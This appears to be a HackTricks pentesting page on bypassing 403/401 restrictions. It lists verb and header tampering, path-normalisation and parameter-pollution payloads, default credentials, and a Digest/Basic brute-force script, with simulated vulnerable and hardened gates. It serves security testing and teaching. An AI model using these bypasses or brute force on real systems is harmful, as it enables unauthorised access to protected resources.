403 & 401 Bypasses
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
HTTP Verbs/Methods Fuzzing
Try using different verbs to access the file: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK
- Check the response headers; some information may leak. For example, a 200 response to HEAD with `Content-Length: 55` means the HEAD verb can reach the resource, although HEAD returns no body, so you still need a way to exfiltrate that content.
- A header such as `X-HTTP-Method-Override: PUT` can change the verb the application acts on.
- Use the TRACE verb; if you are very lucky, the response echoes the request, including headers added by intermediate proxies, which can be useful.
HTTP Headers Fuzzing
- Change the Host header to an arbitrary value (that worked here).
- Try other User Agents to access the resource.
- Fuzz HTTP headers: try HTTP proxy headers, HTTP Basic and NTLM authentication brute force (with a few combinations only) and other techniques. To do all of this I created the tool fuzzhttpbypass.
  - `X-Originating-IP: 127.0.0.1`
  - `X-Forwarded-For: 127.0.0.1`
  - `X-Forwarded: 127.0.0.1`
  - `Forwarded-For: 127.0.0.1`
  - `X-Remote-IP: 127.0.0.1`
  - `X-Remote-Addr: 127.0.0.1`
  - `X-ProxyUser-Ip: 127.0.0.1`
  - `X-Original-URL: 127.0.0.1`
  - `Client-IP: 127.0.0.1`
  - `True-Client-IP: 127.0.0.1`
  - `Cluster-Client-IP: 127.0.0.1`
  - `Host: localhost`
- If the path is protected, you can try to bypass the path protection with these other headers:
  - `X-Original-URL: /admin/console`
  - `X-Rewrite-URL: /admin/console`
- If the page is behind a proxy, maybe it is the proxy that is blocking access to the private information. Try abusing HTTP Request Smuggling or hop-by-hop headers.
- Fuzz special HTTP headers looking for different responses.
- Fuzz special HTTP headers while fuzzing HTTP methods.
- Remove the Host header and maybe you will be able to bypass the protection.
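The verb and header tricks above all exploit the same gap: the access check looks at one view of the request (raw method, raw path, a client IP copied from a header) while the application acts on another. The following added example, which is not HackTricks code, generates the variants listed above and runs them against a simulated backend gate that has the typical mistakes, then against a hardened version of the same gate. The proxy address, client address and `/admin/console` path are constructed for the example.

```python
# Added example (not HackTricks code): verb/header variants against a simulated
# access gate. TRUSTED_PROXY, ATTACKER_IP and the paths are constructed values.
IP_SPOOF_HEADERS = [
    "X-Originating-IP", "X-Forwarded-For", "X-Forwarded", "Forwarded-For",
    "X-Remote-IP", "X-Remote-Addr", "X-ProxyUser-Ip", "Client-IP",
    "True-Client-IP", "Cluster-Client-IP",
]
URL_OVERRIDE_HEADERS = ["X-Original-URL", "X-Rewrite-URL"]
METHODS = ["HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE", "PATCH", "INVENTED"]
TRUSTED_PROXY = "10.0.0.2"    # assumed address of the site's own reverse proxy
ATTACKER_IP = "203.0.113.5"   # assumed address of the external client


def variants(path):
    """Yield (label, method, request_path, headers) for one protected path."""
    yield ("baseline", "GET", path, {})
    for m in METHODS:
        yield (f"method {m}", m, path, {})
    for m in ("PUT", "DELETE", "PATCH"):
        yield (f"override {m}", "POST", path, {"X-HTTP-Method-Override": m})
    for h in IP_SPOOF_HEADERS:
        yield (f"header {h}", "GET", path, {h: "127.0.0.1"})
    for h in URL_OVERRIDE_HEADERS:
        # ask for a public path and smuggle the protected one in the header
        yield (f"header {h}", "GET", "/", {h: path})


def weak_gate(method, path, headers, remote_addr=ATTACKER_IP):
    """Simulated vulnerable handler; returns (status, path actually served)."""
    # mistake 1: the method override is applied before authorisation runs
    method = headers.get("X-HTTP-Method-Override", method).upper()
    # mistake 2: URL override headers are honoured from any client...
    served = headers.get("X-Original-URL") or headers.get("X-Rewrite-URL") or path
    # mistake 3: ...while the ACL below is evaluated on the raw request path
    # mistake 4: the first X-Forwarded-For hop is believed, whoever sent it
    client_ip = headers.get("X-Forwarded-For", remote_addr).split(",")[0].strip()
    # mistake 5: the rule only lists GET and POST
    if path.startswith("/admin") and method in ("GET", "POST") and client_ip != "127.0.0.1":
        return 403, None
    return 200, served


def hardened_gate(method, path, headers, remote_addr=ATTACKER_IP):
    """Same handler with the mistakes fixed."""
    served = path  # override and rewrite headers are not honoured at all
    if remote_addr == TRUSTED_PROXY and "X-Forwarded-For" in headers:
        # only the hop appended by our own proxy (the rightmost one) is believed
        client_ip = headers["X-Forwarded-For"].split(",")[-1].strip()
    else:
        client_ip = remote_addr  # a direct client cannot spoof its address
    if served.startswith("/admin") and client_ip != "127.0.0.1":  # any method
        return 403, None
    return 200, served


def fuzz(path, gate):
    """Labels of the variants that get the protected path served with 200.
    Against a real target you would compare status and length with the baseline."""
    hits = []
    for label, method, req_path, headers in variants(path):
        status, served = gate(method, req_path, headers)
        if status == 200 and served == path:
            hits.append(label)
    return hits


if __name__ == "__main__":
    for name, gate in (("weak", weak_gate), ("hardened", hardened_gate)):
        print(name, fuzz("/admin/console", gate))
```

Against the weak gate every non-GET/POST verb, the method override, `X-Forwarded-For` and both URL override headers succeed, while the other IP headers do nothing because that handler never reads them; which headers work on a real target depends on the framework, which is why the whole list is sent. The hardened gate applies the rule to every method, ignores rewrite headers, and trusts `X-Forwarded-For` only when the TCP peer is the site's own proxy.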
Path Fuzzing
If /path is blocked:
- Try using /%2e/path (if access is blocked by a proxy, this could bypass the protection). Also try /%252e/path (double URL encoding)
- Try a Unicode bypass: /%ef%bc%8fpath (the URL-encoded characters are a fullwidth "/"), so once decoded it becomes //path and maybe you have already bypassed the /path name check
- Other path bypasses:
  - site.com/secret –> HTTP 403 Forbidden
  - site.com/SECRET –> HTTP 200 OK
  - site.com/secret/ –> HTTP 200 OK
  - site.com/secret/. –> HTTP 200 OK
  - site.com//secret// –> HTTP 200 OK
  - site.com/./secret/.. –> HTTP 200 OK
  - site.com/;/secret –> HTTP 200 OK
  - site.com/.;/secret –> HTTP 200 OK
  - site.com//;//secret –> HTTP 200 OK
  - site.com/secret.json –> HTTP 200 OK (ruby)
- Use this list in the following positions:
  - /FUZZsecret
  - /FUZZ/secret
  - /secretFUZZ
- Other API bypasses:
  - /v3/users_data/1234 --> 403 Forbidden
  - /v1/users_data/1234 --> 200 OK
  - {"id":111} --> 401 Unauthorized
  - {"id":[111]} --> 200 OK
  - {"id":111} --> 401 Unauthorized
  - {"id":{"id":111}} --> 200 OK
  - {"user_id":"<legit_id>","user_id":"<victims_id>"} (JSON Parameter Pollution)
  - user_id=ATTACKER_ID&user_id=VICTIM_ID (Parameter Pollution)
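The path tricks above work when the component that blocks `/secret` matches the raw string while the backend normalises the path before routing. The following added example, not HackTricks code, builds the candidates from the list above and reports which ones pass a proxy rule written as an exact string match yet still resolve to the protected path on a simulated backend. The backend model is an assumption with two switches for the behaviours that vary most between servers: how many times the path is percent-decoded and whether matching is case-insensitive. The `/./secret/..` entry is left out of the generator because standard dot-segment normalisation resolves it to `/`, so whether it works depends on backend-specific handling.

```python
# Added example (not HackTricks code): path variants versus a string-matching
# proxy and a normalising backend. The backend behaviour is simulated.
import posixpath
import re
import unicodedata
from urllib.parse import unquote


def path_variants(protected):
    """The bypass candidates from the list above, keyed by technique."""
    name = protected.strip("/")
    return {
        "raw": f"/{name}",
        "dot segment": f"/%2e/{name}",
        "double-encoded dot": f"/%252e/{name}",
        "fullwidth slash": f"/%ef%bc%8f{name}",
        "upper case": f"/{name.upper()}",
        "trailing slash": f"/{name}/",
        "trailing dot": f"/{name}/.",
        "double slashes": f"//{name}//",
        "semicolon segment": f"/;/{name}",
        "dot-semicolon segment": f"/.;/{name}",
        "double semicolon": f"//;//{name}",
        "format suffix": f"/{name}.json",
    }


def naive_proxy_blocks(raw_path, protected):
    """Proxy rule written as an exact, case-sensitive match on the raw path."""
    return raw_path == protected


def backend_resolve(raw_path, decode_passes=1, case_insensitive=False):
    """What a typical backend turns the raw path into before routing (assumed model)."""
    p = raw_path
    for _ in range(decode_passes):        # some stacks percent-decode twice
        p = unquote(p)
    p = unicodedata.normalize("NFKC", p)  # fullwidth U+FF0F becomes "/"
    p = "/".join(seg.split(";", 1)[0] for seg in p.split("/"))  # drop ;params
    p = re.sub(r"/+", "/", p)             # collapse repeated slashes
    p = posixpath.normpath(p)             # resolve "." and ".." segments
    p = re.sub(r"\.(json|xml)$", "", p)   # Rails-style format extension
    return p.lower() if case_insensitive else p


def hardened_proxy_blocks(raw_path, protected):
    """Normalise with the most permissive settings before prefix-matching."""
    resolved = backend_resolve(raw_path, decode_passes=2, case_insensitive=True)
    return resolved == protected or resolved.startswith(protected + "/")


def find_bypasses(protected, proxy=naive_proxy_blocks, **backend_opts):
    """Variants the proxy lets through that the backend still maps to `protected`."""
    hits = {}
    for label, raw in path_variants(protected).items():
        if not proxy(raw, protected) and backend_resolve(raw, **backend_opts) == protected:
            hits[label] = raw
    return hits


if __name__ == "__main__":
    for label, raw in find_bypasses("/secret").items():
        print(f"{label:24s} {raw}")
```

With the defaults, the dot segment, fullwidth slash, trailing slash/dot, doubled slashes, the three semicolon forms and the `.json` suffix all get through; `/%252e/secret` only works when the backend decodes twice and `/SECRET` only when it matches case-insensitively, which is why both still belong in the list. The hardened proxy rule normalises before matching and lets none of them through, but the real fix is to enforce the check in the backend on the path it actually serves.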
Parameter Manipulation
- Change the param value: from `id=123` to `id=124`
- Add additional parameters to the URL: from `?id=124` to `?id=124&isAdmin=true`
- Remove the parameters
- Reorder the parameters
- Use special characters.
- Perform boundary testing in the parameters: provide values like -234 or 0 or 99999999 (just some example values).
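The duplicate-parameter and type-juggling entries in the API list above (`{"id":[111]}`, `{"id":{"id":111}}`, JSON and query-string parameter pollution) and the parameter manipulation tricks here share one root cause: an authorisation check validates one copy or one type of a value and the application acts on another. The following added example, not HackTricks code, shows that pattern on both JSON bodies and query strings next to a hardened version. The user ids and records are constructed; the gateway parser is simulated as "first duplicate key wins" while the backend uses Python's `json.loads`, which keeps the last.

```python
# Added example (not HackTricks code): parameter pollution and type juggling
# against a check that validates one copy of a value and uses another.
import json
from urllib.parse import parse_qsl

ATTACKER, VICTIM = 222, 111  # constructed ids; the page's examples use 111 as the foreign id
RECORDS = {ATTACKER: "attacker's own data", VICTIM: "victim's data"}


def first_wins(pairs):
    """object_pairs_hook: keep the first of duplicate JSON keys (some parsers do)."""
    return dict(reversed(pairs))


def reject_duplicates(pairs):
    """object_pairs_hook: refuse bodies with duplicate keys outright."""
    seen = {}
    for key, value in pairs:
        if key in seen:
            raise ValueError(f"duplicate key {key!r}")
        seen[key] = value
    return seen


def coerce_id(value):
    """Lenient backend coercion, modelled on ORMs that accept lists/objects."""
    if isinstance(value, list):
        return coerce_id(value[0])
    if isinstance(value, dict):
        return coerce_id(value["id"])
    return int(value)


def vulnerable_json(raw, session_user):
    """Gateway: first-wins parse, validates only an int id. Backend: last-wins parse, coerces."""
    uid = json.loads(raw, object_pairs_hook=first_wins)["id"]
    if isinstance(uid, int) and uid != session_user:   # lists/objects skip the check
        return 401, None
    uid = coerce_id(json.loads(raw)["id"])              # last duplicate key wins here
    return 200, RECORDS[uid]


def hardened_json(raw, session_user):
    """One parser, duplicates rejected, strict type and value check before use."""
    try:
        body = json.loads(raw, object_pairs_hook=reject_duplicates)
    except ValueError:
        return 400, None
    uid = body.get("id")
    if type(uid) is not int or uid != session_user:
        return 401, None
    return 200, RECORDS[uid]


def vulnerable_query(query, session_user):
    """Gateway reads the first user_id; the app reads the last (dict() keeps the last)."""
    pairs = parse_qsl(query)
    first = next((v for k, v in pairs if k == "user_id"), None)
    if first is None or int(first) != session_user:
        return 401, None
    return 200, RECORDS[int(dict(pairs)["user_id"])]


def hardened_query(query, session_user):
    """Reject repeated parameters, then check the single value."""
    values = [v for k, v in parse_qsl(query) if k == "user_id"]
    if len(values) != 1:
        return 400, None
    if int(values[0]) != session_user:
        return 401, None
    return 200, RECORDS[int(values[0])]
```

`{"id":111}` is refused, but `{"id":[111]}` and `{"id":{"id":111}}` skip the type-specific check and are coerced back to 111 by the backend, and `{"id":222,"id":111}` passes the gateway (222) while the backend reads 111. The hardened versions parse once, refuse duplicates, and compare type and value before touching the record.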
Protocol version
If you are using HTTP/1.1, try HTTP/1.0, or even check whether the server supports HTTP/2.0.
Other Bypasses
- Get the IP or CNAME of the domain and try contacting it directly.
- Try to stress the server by sending common GET requests (it worked for this guy with Facebook).
- Change the protocol: from http to https, or from https to http
- Go to https://archive.org/web/ and check whether in the past that file was publicly accessible.
Brute Force
- Guess the password: try the following common credentials. Do you know something about the victim? Or the name of the CTF challenge?
- Brute force: try Basic, Digest and NTLM auth.
admin admin
admin password
admin 1234
admin admin1234
admin 123456
root toor
test test
guest guest
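For Basic auth a brute-force attempt is just a base64 header, but for Digest each attempt must compute the RFC 2617 response from the server's realm and nonce. The following added example, not HackTricks code, runs the credential list above against both schemes. The server side is a small in-process simulation so it runs offline; the realm, nonce and stored credentials are constructed, and NTLM is left out because it needs the full multi-message challenge/response exchange.

```python
# Added example (not HackTricks code): Basic and Digest brute force against a
# simulated server. Realm, nonce and the account are constructed values.
import base64
import hashlib
import hmac
import re

CANDIDATES = [
    ("admin", "admin"), ("admin", "password"), ("admin", "1234"),
    ("admin", "admin1234"), ("admin", "123456"), ("root", "toor"),
    ("test", "test"), ("guest", "guest"),
]


def md5(text):
    return hashlib.md5(text.encode()).hexdigest()


def parse_auth(header):
    """Split 'Scheme k="v", k2=v2' into (scheme, {k: v}); used in both directions."""
    scheme, _, rest = header.partition(" ")
    return scheme, dict(re.findall(r'(\w+)="?([^",]*)"?', rest))


def basic_header(user, pwd):
    return "Basic " + base64.b64encode(f"{user}:{pwd}".encode()).decode()


def digest_response(user, pwd, realm, nonce, method, uri, nc, cnonce):
    """RFC 2617 response value for qop=auth with MD5."""
    ha1 = md5(f"{user}:{realm}:{pwd}")
    ha2 = md5(f"{method}:{uri}")
    return md5(f"{ha1}:{nonce}:{nc}:{cnonce}:auth:{ha2}")


def digest_header(user, pwd, challenge, method, uri, nc="00000001", cnonce="0a4f113b"):
    resp = digest_response(user, pwd, challenge["realm"], challenge["nonce"], method, uri, nc, cnonce)
    return (f'Digest username="{user}", realm="{challenge["realm"]}", '
            f'nonce="{challenge["nonce"]}", uri="{uri}", qop=auth, nc={nc}, '
            f'cnonce="{cnonce}", response="{resp}"')


class FakeServer:
    """Simulated protected endpoint with one account (constructed values)."""
    realm = "Restricted"
    nonce = "dcd98b7102dd2f0e8b11d0f600bfb0c093"

    def __init__(self, user, pwd, scheme="Digest"):
        self.user, self.pwd, self.scheme = user, pwd, scheme

    def challenge(self):
        if self.scheme == "Basic":
            return f'Basic realm="{self.realm}"'
        return f'Digest realm="{self.realm}", qop="auth", nonce="{self.nonce}", algorithm=MD5'

    def check(self, authorization, method="GET", uri="/admin"):
        """Status the server would answer to this Authorization header."""
        scheme, params = parse_auth(authorization)
        if scheme != self.scheme:
            return 401
        if scheme == "Basic":
            _, _, rest = authorization.partition(" ")
            user, _, pwd = base64.b64decode(rest).decode().partition(":")
            ok = hmac.compare_digest(f"{user}:{pwd}".encode(), f"{self.user}:{self.pwd}".encode())
            return 200 if ok else 401
        if params.get("username") != self.user or params.get("nonce") != self.nonce:
            return 401
        expected = digest_response(self.user, self.pwd, self.realm, self.nonce,
                                   method, params["uri"], params["nc"], params["cnonce"])
        return 200 if hmac.compare_digest(expected, params.get("response", "")) else 401


def brute_force(server, method="GET", uri="/admin"):
    """Try each candidate pair against whichever scheme the server advertises."""
    scheme, challenge = parse_auth(server.challenge())
    for user, pwd in CANDIDATES:
        if scheme == "Digest":
            header = digest_header(user, pwd, challenge, method, uri)
        else:
            header = basic_header(user, pwd)
        if server.check(header, method, uri) == 200:
            return user, pwd
    return None


if __name__ == "__main__":
    print(brute_force(FakeServer("admin", "admin1234")))
    print(brute_force(FakeServer("root", "toor", scheme="Basic")))
```

The `digest_response` function reproduces the worked example in RFC 2617 section 3.5 (user Mufasa, realm testrealm@host.com, response `6629fae49393a05397450978507c4ef1`), which is a convenient sanity check before pointing a real client at a target. Note that a real server issues a fresh nonce per challenge, so each attempt should reuse the nonce from the most recent 401 rather than a cached one.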
Automatic Tools
- https://github.com/lobuhi/byp4xx
- https://github.com/iamj0ker/bypass-403
- https://github.com/gotr00t0day/forbiddenpass
- Burp Extension - 403 Bypasser
- Forbidden Buster
- NoMoreForbidden